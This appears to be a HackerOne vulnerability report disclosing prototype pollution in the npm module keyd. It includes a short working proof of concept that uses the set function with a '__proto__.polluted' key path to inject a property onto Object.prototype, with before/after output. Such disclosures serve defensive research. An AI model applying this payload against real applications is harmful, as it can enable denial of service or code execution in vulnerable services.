hackerone | D3lla | H1:877515
History: May 18, 2020 - 7:58 p.m.

Node.js third-party modules: [keyd] Prototype pollution

2020-05-18 19:58:29
d3lla
hackerone.com

I would like to report a prototype pollution vulnerability in the keyd module.
It allows an attacker to inject properties on Object.prototype.

Module

  • module name: keyd
  • version: 1.3.4
  • npm page: https://www.npmjs.com/package/keyd

Module Description

A small library for using and manipulating key paths in JavaScript.

Module Stats

[71] weekly downloads

Vulnerability

Vulnerability Description

The set function can be used to add/modify properties of the Object prototype. These properties will be present on all objects.

Steps To Reproduce:

  • install keyd module:
    • npm i keyd

Set the __proto__.polluted property of an object:


const keyd = require('keyd');
const obj = {};
console.log("Before : " + obj.polluted);
keyd({}).set('__proto__.polluted', 'yes');
console.log("After : " + obj.polluted);

Output:


Before : undefined
After : yes

Supporting Material/References:

  • OPERATING SYSTEM VERSION: Ubuntu 18.04.4 LTS
  • NODEJS VERSION: v14.1.0
  • NPM VERSION: 6.14.5

Wrap up

  • I contacted the maintainer to let them know: [N]
  • I opened an issue in the related repository: [N]

Thank you for your time.

best regards,

d3lla

Impact

The impact depends on the application. In some cases it is possible to achieve denial of service (DoS), remote code execution, or property injection.